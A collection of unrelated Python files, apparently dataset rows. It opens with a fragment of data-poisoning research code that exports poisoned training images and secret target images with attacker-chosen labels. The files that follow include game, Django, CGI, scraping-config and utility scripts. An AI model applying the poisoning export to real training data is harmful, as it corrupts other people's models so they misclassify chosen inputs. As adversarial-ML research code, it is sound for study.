os.makedirs(os.path.join(path, 'targets', name), exist_ok=True)
for input, label, idx in self.trainset:
lookup = self.poison_lookup.get(idx)
if lookup is not None:
_save_image(input, label, idx, location=os.path.join(path, 'train', names[label]), train=True)
print('Poisoned training images exported ...')
# Save secret targets
for enum, (target, _, idx) in enumerate(self.targetset):
intended_class = self.poison_setup['intended_class'][enum]
_save_image(target, intended_class, idx, location=os.path.join(path, 'targets', names[intended_class]), train=False)
print('Target images exported with intended class labels ...')
elif mode == 'full':
# Save training set
names = self.trainset.classes
for name in names:
os.makedirs(os.path.join(path, 'train', name), exist_ok=True)
os.makedirs(os.path.join(path, 'test', name), exist_ok=True)
os.makedirs(os.path.join(path, 'targets', name), exist_ok=True)
for input, label, idx in self.trainset:
_save_image(input, label, idx, location=os.path.join(path, 'train', names[label]), train=True)
print('Poisoned training images exported ...')
for input, label, idx in self.validset:
_save_image(input, label, idx, location=os.path.join(path, 'test', names[label]), train=False)
print('Unaffected validation images exported ...')
# Save secret targets
for enum, (target, _, idx) in enumerate(self.targetset):
intended_class = self.poison_setup['intended_class'][enum]
_save_image(target, intended_class, idx, location=os.path.join(path, 'targets', names[intended_class]), train=False)
print('Target images exported with intended class labels ...')
elif mode in ['automl-upload', 'automl-all', 'automl-baseline']:
from ..utils import automl_bridge
targetclass = self.targetset[0][1]
poisonclass = self.poison_setup["poison_class"]
name_candidate = f'{self.args.name}_{self.args.dataset}T{targetclass}P{poisonclass}'
name = ''.join(e for e in name_candidate if e.isalnum())
if mode == 'automl-upload':
automl_phase = 'poison-upload'
elif mode == 'automl-all':
automl_phase = 'all'
elif mode == 'automl-baseline':
automl_phase = 'upload'
automl_bridge(self, poison_delta, name, mode=automl_phase, dryrun=self.args.dryrun)
elif mode == 'numpy':
_, h, w = self.trainset[0][0].shape
training_data = np.zeros([len(self.trainset), h, w, 3])
labels = np.zeros(len(self.trainset))
for input, label, idx in self.trainset:
lookup = self.poison_lookup.get(idx)
if lookup is not None:
input += poison_delta[lookup, :, :, :]
training_data[idx] = np.asarray(_torch_to_PIL(input))
labels[idx] = label
np.save(os.path.join(path, 'poisoned_training_data.npy'), training_data)
np.save(os.path.join(path, 'poisoned_training_labels.npy'), labels)
elif mode == 'kettle-export':
with open(f'kette_{self.args.dataset}{self.args.model}.pkl', 'wb') as file:
pickle.dump([self, poison_delta], file, protocol=pickle.HIGHEST_PROTOCOL)
elif mode == 'benchmark':
foldername = f'{self.args.name}_{"_".join(self.args.net)}'
sub_path = os.path.join(path, 'benchmark_results', foldername, str(self.args.benchmark_idx))
os.makedirs(sub_path, exist_ok=True)
# Poisons
benchmark_poisons = []
for lookup, key in enumerate(self.poison_lookup.keys()): # This is a different order than we usually do for compatibility with the benchmark
input, label, _ = self.trainset[key]
input += poison_delta[lookup, :, :, :]
benchmark_poisons.append((_torch_to_PIL(input), int(label)))
with open(os.path.join(sub_path, 'poisons.pickle'), 'wb+') as file:
pickle.dump(benchmark_poisons, file, protocol=pickle.HIGHEST_PROTOCOL)
# Target
target, target_label, _ = self.targetset[0]
with open(os.path.join(sub_path, 'target.pickle'), 'wb+') as file:
pickle.dump((_torch_to_PIL(target), target_label), file, protocol=pickle.HIGHEST_PROTOCOL)
# Indices
with open(os.path.join(sub_path, 'base_indices.pickle'), 'wb+') as file:
pickle.dump(self.poison_ids, file, protocol=pickle.HIGHEST_PROTOCOL)
else:
raise NotImplementedError()
print('Dataset fully exported.')
|
from Tkinter import *
from iso.Input import *
from iso.Scene import *
from iso.Viewport import *
from iso.Scroller import *
from iso.SpritePicker import *
from iso.SpriteGrabber import *
from iso.Sprite import *
from iso.Updateables import *
from iso.utils import *
from iso.Vector3D import *
from Terrain import *
from Heightmap import *
import pygame
class Example():
def __init__(self):
pygame.init()
pygame.display.set_caption("PySmallIsoExample")
screen = pygame.display.set_mode((1024, 768), pygame.RESIZABLE | pygame.DOUBLEBUF | pygame.HWSURFACE )
self.screen = screen
input = Input()
scene = Scene()
scene.addLayer("Land", 0)
scene.addLayer("Overlays", 1)
scene.addLayer("Overground", 2)
viewport = Viewport(screen, scene)
self.viewport = viewport
scroller = Scroller(viewport, input)
scroller.enable()
updater = Updater()
self.updater = updater
sprite_picker = SpritePicker(input, viewport)
sprite_picker.enable()
sprite_grabber = SpriteGrabber(input, viewport)
sprite_grabber.enable()
img = loadImage("assets/truck.png")
spr = Sprite(img)
scene.addSprite("Overground", spr)
img = loadImage("assets/aircraft.png")
spr = Sprite(img)
spr.setLocation(Vector3D(0.5,0,0))
scene.addSprite("Overground", spr)
img = loadImage("assets/forklift.png")
spr = Sprite(img)
spr.setLocation(Vector3D(0.5,0.5,0))
scene.addSprite("Overground", spr)
hm = SimplexHeightmap(200,200)
terrain = Terrain(hm)
tiles = terrain.create()
for tile in tiles:
scene.addSprite("Land", tile)
done = False
clock = pygame.time.Clock()
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
else:
input.handleEvent(event)
self.redraw()
self.update()
pygame.display.flip()
clock.tick(60)
def redraw(self):
self.screen.fill((255,255,255))
self.viewport.draw()
def update(self):
self.updater.update()
if __name__ == "__main__":
game = Example()
|
from django.shortcuts import render
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view
from pdf2image import convert_from_bytes, convert_from_path
import os
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from django.conf import settings
from datetime import datetime
from .models import JsonData
import ast
@api_view(['POST'])
def upload(request):
file = request.FILES['pdf']
timestamp = datetime.timestamp(datetime.now())
path = default_storage.save('media/' + str(timestamp) + '.pdf', ContentFile(file.read()))
tmp_file = os.path.join(settings.MEDIA_ROOT, path)
images = convert_from_path(tmp_file, dpi=70)
count = 0
content = []
for image in images:
temp = {}
count = count + 1
temp['page'] = count
real_image = "media/" + str(timestamp) + str(count) + ".webp"
image.resize((1438, 922))
image.save(real_image, "webp", optimize=True, quality=7)
temp['image'] = real_image
image.resize((119, 185))
thumb = "media/" + str(timestamp) + str(count) + "-thumb.webp"
image.save(thumb, "webp", optimize=True, quality=7)
temp['thumb'] = thumb
content.append(temp)
finalc = JsonData.objects.create(
content=content
)
finalc.save()
return Response(content, status=status.HTTP_200_OK)
@api_view(['GET'])
def latest(request):
data = JsonData.objects.all().order_by('-id')[0]
return Response(ast.literal_eval(data.content), status=status.HTTP_200_OK)
# except ValueError:
# content = {
# 'message': "Please upload the file"
# }
# return Response(content, status=status.HTTP_400_BAD_REQUEST)
|
# Generated by Django 2.2.13 on 2020-07-04 15:41
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shop', '0015_carousel'),
]
operations = [
migrations.DeleteModel(
name='Carousel',
),
]
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : 01-split_dataset.py
@Time : 2020/02/19 09:58:11
@Author : liululu
@brief : 划分数据集,制作my_dataset
@Contact : liululu827@163.com
@Desc : None
'''
# here put the import lib
import os
import random
# shutil.copy(source,destination)将source的文件拷贝到destination,两个参数都是字符串格式。
import shutil
def makedir(new_dir):
if not os.path.exists(new_dir):
os.makedirs(new_dir)
if __name__ == '__main__':
random.seed(1)
dataset_dir = os.path.join('..', 'data', 'RMB_data')
split_dir = os.path.join('..', 'data', 'my_dataset')
train_dir = os.path.join(split_dir, "train")
valid_dir = os.path.join(split_dir, "valid")
test_dir = os.path.join(split_dir, "test")
# print(train_dir)
train_pct = 0.8
valid_pct = 0.1
test_pct = 0.1
'''
root 所指的是当前正在遍历的这个文件夹的本身的地址
dirs 是一个 list ,内容是该文件夹中所有的目录的名字(不包括子目录)
files 同样是 list , 内容是该文件夹中所有的文件(不包括子目录)
'''
for root, dirs, files in os.walk(dataset_dir):
for sub_dir in dirs: # dataset_dir下面的所有文件夹名
imgs = os.listdir(os.path.join(root, sub_dir)) # sub_dir文件夹下所有的文件名
imgs = list(
filter(
lambda x: x.endswith('.jpg'),
imgs)) # sub_dir 文件夹下所有的.jpg文件
# 打乱
random.shuffle(imgs)
img_count = len(imgs)
# 分比例
train_point = int(img_count * train_pct)
valid_point = int(img_count * (train_pct + valid_pct))
# 分训练集验证集与测试集
for i in range(img_count):
if i < train_point:
out_dir = os.path.join(train_dir, sub_dir)
elif i < valid_point:
out_dir = os.path.join(valid_dir, sub_dir)
else:
out_dir = os.path.join(test_dir, sub_dir)
# print(out_dir)
makedir(out_dir)
# 将文件复制到目标文件夹中
target_path = os.path.join(out_dir, imgs[i])
src_path = os.path.join(dataset_dir, sub_dir, imgs[i])
shutil.copy(src_path, target_path)
print(
'Class:{}, train:{}, valid:{}, test:{}'.format(
sub_dir,
train_point,
valid_point -
train_point,
img_count -
valid_point))
|
import pandas as pd
df = pd.read_csv(r"C:\Users\avivy\GitHub\Hacking 101\.CSV\Paths.csv", header=None)
A_col = df.iloc[:, 0].values
B_col = df.iloc[:, 1].values
C_col = df.iloc[:, 2].values
D_col = df.iloc[:, 3].values
print(D_col[4])
exit()
# for i in range(186):
# print("start " + A_col[1] + str(i) + "\n" + "timeout /t 5")
|
from itertools import cycle
from shared import read_input_lines, exec_cl_function
INPUT = '../input/day1.txt'
def first_duplicate():
total = 0
seen = set()
for freq in cycle(read_input_lines(INPUT, convert_to=int)):
total += freq
if total in seen:
return total, len(seen)
seen.add(total)
def part1():
print(sum(read_input_lines(INPUT, convert_to=int)))
def part2():
print('first duplicate result {} after {:,d} calculations'.format(
*first_duplicate()))
if __name__ == '__main__':
exec_cl_function()
|
from django.forms import TextInput
from django import forms
from ...models import Address
class AddressForm(forms.ModelForm):
class Meta:
model = Address
#fields = '__all__'
fields = ['alias','street','number','appartment','floor','comuna','comments']
widgets = {
'alias' : TextInput(attrs={'placeholder': '<alias>'}),
'street' : TextInput(attrs={'placeholder': '<calle>'}),
'number' : TextInput(attrs={'placeholder': '<número>'}),
'appartment' : TextInput(attrs={'placeholder': '<opcional>'}),
'floor' : TextInput(attrs={'placeholder': '<opcional>'}),
'comments' : TextInput(attrs={'placeholder': '<opcional>'}),
}
labels = {
'alias' : 'Alias',
'street' : 'Calle',
'number' : 'Número',
'appartment' : 'Departamento',
'floor' : 'Piso',
'comments' : 'Referencia',
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['appartment'].required = False
self.fields['floor'].required = False
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'colon',
'type': 'executable',
'sources': [
'a:b.c',
],
'copies': [
{
'destination': '<(PRODUCT_DIR)/',
# MSVS2008 gets confused if the same file is in 'sources' and 'copies'
'files': [ 'a:b.c-d', ],
},
],
},
],
}
|
import sys
try:
from Tkinter import *
except ImportError:
from tkinter import *
class CreateMenu(Menu):
def __init__(self, root):
Menu.__init__(self, root)
self.filemenu = Menu(self, tearoff=0)
self.filemenu.add_command(label="New", command=root.new_file)
self.filemenu.add_command(label="Open", command=root.open_file)
self.filemenu.add_command(label="Save", command=root.save_file)
self.filemenu.add_command(label="Save as...", command=root.save_file)
self.filemenu.add_command(label="Save and Close", command=root.save_close_file)
self.filemenu.add_separator()
self.filemenu.add_command(label="Exit", command=root.quit)
self.add_cascade(label="File", menu=self.filemenu)
self.helpmenu = Menu(self, tearoff=0)
self.helpmenu.add_command(label="Help Index", command=root.donothing)
self.helpmenu.add_command(label="About...", command=root.donothing)
self.add_cascade(label="Help", menu=self.helpmenu)
|
################################################################################
# https://stackoverflow.com/questions/14132789/relative-imports-for-the-billionth-time
################################################################################
import sys
import os
def add_import_absolute_folder(folder):
#
# hack to add external private data
#
absolute = os.path.abspath(folder)
print(f"{__name__}: add {absolute} to sys.path")
sys.path.insert(0, absolute)
print(f"{__name__}: sys.path: {sys.path}")
def add_parent_import():
#
# hack to add external private data
#
print(f"{__name__}: add .. to sys.path")
sys.path.insert(0, "..")
print(f"{__name__}: sys.path: {sys.path}")
################################################################################
# https://stackoverflow.com/questions/14132789/relative-imports-for-the-billionth-time
# https://chrisyeh96.github.io/2017/08/08/definitive-guide-python-imports.html#case-3-importing-from-parent-directory
################################################################################
def parent_import():
"""
add project root to sys.path to import from parent folder
change the number of ".." accordingly
"""
root = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), ".."))
print(f"adding project root tp sys.path: {root=}")
sys.path.append(root)
################################################################################
def show_syspath():
for n, p in enumerate(sys.path):
print(f"{n=}, {p=}")
if __name__ == '__main__':
if not __package__:
"""
running this script directly
"""
print("not package")
import parentimport
parentimport.parent_import()
# parentimport.show_syspath()
# from debug import Debug
# from config import parse_arguments
else:
"""
importing this script from another script
"""
print("__package__: ", __package__)
from . import parentimport
parentimport.parent_import()
# parentimport.show_syspath()
# from .debug import Debug # ok
# from .config import parse_arguments
|
#!/Users/there/miniconda3/envs/NLP_Koncks/bin/python
# coding: utf-8
from string import Template
import pymongo
from pymongo import MongoClient
import cgi
import cgitb
from html import escape
cgitb.enable()
max_view_count = 20
template_html = Template('''
<html>
<head>
<title>Database MusicBrainz</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style>
body{
max-width:410px;
padding: 10%;
margin:0 auto;
}
</style>
</head>
<body>
<form method="GET" action="/cgi-bin/main.py">
Name or aliases:<br>
<input type="text" name="name" value="$clue_name" size="20"/><br />
Tag:<br>
<input type="text" name="tag" value="$clue_tag" size="20"/><br />
<input type="submit" value="Search"/>
</form>
$message
$contents
</body>
</html>
''')
template_result = Template('''
<hr />
Record $index of $total:<br />
<li>Name: $name <br />
<li>Aliases: $aliases<br />
<li>Activity area: $area <br />
<li>Tags: $tags <br />
<li>Rating: $rating <br />
''')
client = MongoClient()
db = client.db_MusicBrainz
collection = db.artists
form = cgi.FieldStorage()
clue = {}
clue_name = ''
clue_tag = ''
if 'name' in form:
clue_name = form['name'].value
clue = {'$or': [{'name': clue_name}, {'aliases.name': clue_name}]}
if 'tag' in form:
clue_tag = form['tag'].value
if len(clue) > 0:
clue = {'$and': [clue, {'tags.value': clue_tag}]}
else:
clue = {'tags.value': clue_tag}
contents = ''
total = -1
if len(clue) > 0:
results = collection.find(clue)
results.sort('rating.count', pymongo.DESCENDING)
total = results.count()
dict_template = {}
for i, doc in enumerate(results[0:max_view_count], start=1):
dict_template['index'] = i
dict_template['total'] = total
dict_template['name'] = escape(doc['name'])
if 'aliases' in doc:
dict_template['aliases'] = \
','.join(escape(alias['name']) for alias in doc['aliases'])
else:
dict_template['aliases'] = 'NONE'
if 'area' in doc:
dict_template['area'] = escape(doc['area'])
else:
dict_template['area'] = 'NONE'
if 'tags' in doc:
dict_template['tags'] = \
','.join(escape(tag['value']) for tag in doc['tags'])
else:
dict_template['tags'] = 'NONE'
if 'rating' in doc:
dict_template['rating'] = doc['rating']['count']
else:
dict_template['rating'] = 'NONE'
contents += template_result.substitute(dict_template)
dict_template = {}
dict_template['clue_name'] = escape(clue_name)
dict_template['clue_tag'] = escape(clue_tag)
dict_template['contents'] = contents
if total > max_view_count:
dict_template['message'] = 'Displaying the top {} items.'.format(max_view_count)
elif total == -1:
dict_template['message'] = 'Please enter search clue.'
elif total == 0:
dict_template['message'] = 'No matching artists found.'
else:
dict_template['message'] = ''
print(template_html.substitute(dict_template))
|
import re
f = open("snapdeal.txt",'r')
p = re.compile('input id="Brand-([a-zA-Z0-9]*)"\n*')
print '[',
for line in f:
match = re.findall(p,line)
if match :
print "'",match[0],"',",
print ']' |
#!/usr/bin/env python
"""
Implementation of sequential search on both
ordered and unordered arrays.
"""
from typing import Union, Sequence
TARGETS = Union[str, int, float]
def seq_search(arr: Sequence[TARGETS], elem: TARGETS) -> bool:
"""
Unordered Array
Time Complexity: O(n)
"""
pos, found = 0, False
# Will iterate until found or end of array.
while pos < len(arr) and not found:
if arr[pos] == elem:
found = True
pos += 1
return found
def seq_search_ordered(arr: Sequence[TARGETS], elem: TARGETS) -> bool:
"""
Ordered Array
Time Complexity: O(n)
"""
pos, found, stopped = 0, False, False
while pos < len(arr) and not stopped:
# Will break out of the loop if current elem > parameter passed.
if arr[pos] > elem:
stopped = True
elif arr[pos] == elem:
found = True
stopped = True
pos += 1
return found
def main():
arr = [20, 54, 1, 2, 5, 78, 5, 322, 23, 14]
print(seq_search(arr, 5))
lst = [33, 44, 56, 189, 999, 1234, 55442, 888998]
print(seq_search_ordered(lst, 1235))
if __name__ == "__main__":
main()
|
tt=int(input())
if tt>0:
print(tt+(10-(tt%10)))
|
# coding=utf-8
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from wgdata.utils import _yesterday
dl_file_conf = {
"customer1": {
'URL': 'http://console.sxbrme.com:25031/console_xh_member_account/account/customer/customerList.action',
'SPARE_URL': '',
"METHOD": "POST",
'PARAMS': {
"ec_i": "ec",
"eti": "ec",
"eti_p": "false",
"ec_efn": "(unable to decode value)",
"ec_ev": "csv",
"startdate": _yesterday(),
"enddate": _yesterday()
},
"FILE": {
'FILENAME': "交易商维护_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer2": {
'URL': 'http://console.sxbrme.com:25031/console_xh_member_bank/bankInterface/moneyInfo/capitalExcle.jsp',
'SPARE_URL': '',
"METHOD": "POST",
'PARAMS': {
"s_time": _yesterday(),
"e_time": _yesterday(),
},
"FILE": {
"FILENAME": "出入金管理_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer3": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'SPARE_URL': '',
"METHOD": "POST",
'PARAMS': {
'viewName': 'v_customerhold_search_his_news',
'querytype': 'H',
'startdate': _yesterday(),
'enddate': _yesterday()
},
"FILE": {
"FILENAME": "交易商持牌查询_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer4": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'SPARE_URL': '',
'PARAMS': {
'viewName': 'v_customers_search_his_new',
'querytype': 'H',
'startdate': _yesterday(),
'enddate': _yesterday()
},
"FILE": {
"FILENAME": "交易商成交查询_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer5": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'SPARE_URL': '',
'PARAMS': {
'viewName': 'v_customerlimprice_search_his',
'querytype': 'H',
'startdate': _yesterday(),
'enddate': _yesterday()
},
"FILE": {
"FILENAME": "交易商订单查询_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer6": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'SPARE_URL': '',
'PARAMS': {
'viewName': 'v_customerfundflowsybk_new',
'querytype': 'H',
'startdate': _yesterday(),
'enddate': _yesterday()
},
"FILE": {
"FILENAME": "交易商资金流水查询_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer7": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'PARAMS': {
'viewName': 'v_customer_fund_search_ybk_new'
},
"FILE": {
"FILENAME": "交易商资金查询_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer8": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'SPARE_URL': '',
'PARAMS': {
'viewName': 'v_customerfundflowsybk_new',
'querytype': 'H',
'startdate': _yesterday(),
'enddate': _yesterday()
},
"FILE": {
"FILENAME": "交易商资金状况表_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer9": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'SPARE_URL': '',
'PARAMS': {
'viewName': 'v_customer_hold_stat_new',
'startdate': _yesterday(),
'enddate': _yesterday()
},
"FILE": {
"FILENAME": "交易商持牌汇总表_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
},
"customer10": {
'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
'SPARE_URL': '',
'PARAMS': {
'viewName': 'v_customer_orders_stat_new',
'startdate': _yesterday(),
'enddate': _yesterday()
},
"FILE": {
"FILENAME": "交易商成交汇总表_{yesterday}".format(yesterday=_yesterday()),
"FILETYPE": "csv"
}
}
}
|
# encoding.py
# Copyright (C) 2011-2014 Andrew Svetlov
# andrew.svetlov@gmail.com
#
# This module is part of BloggerTool and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import absolute_import
import markdown
from bloggertool.engine import Meta
class Engine(object):
MARKDOWN_EXTS = ['abbr',
# 'codehilite', # see http://pygments.org/docs/
'def_list',
'fenced_code',
# default at end of html or ///Footnotes Go Here ///
'footnotes',
# configure via header_level and header_forceid: Off
# in md metadata
'headerid',
'meta',
'tables',
'toc', # use [TOC] in md file
]
def do(self, source):
md = markdown.Markdown(extensions=self.MARKDOWN_EXTS)
inner_html = md.convert(source)
meta = Meta
if 'title' in md.Meta:
meta.title = ' '.join(md.Meta['title'])
if 'slug' in md.Meta:
assert len(md.Meta['slug']) == 1
slug = md.Meta['slug'][0]
meta.slug = slug
if 'labels' in md.Meta:
labels_str = ', '.join(md.Meta['labels'])
labels = [l.strip() for l in labels_str.split(',')]
meta.labels = frozenset(labels)
return inner_html, meta
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.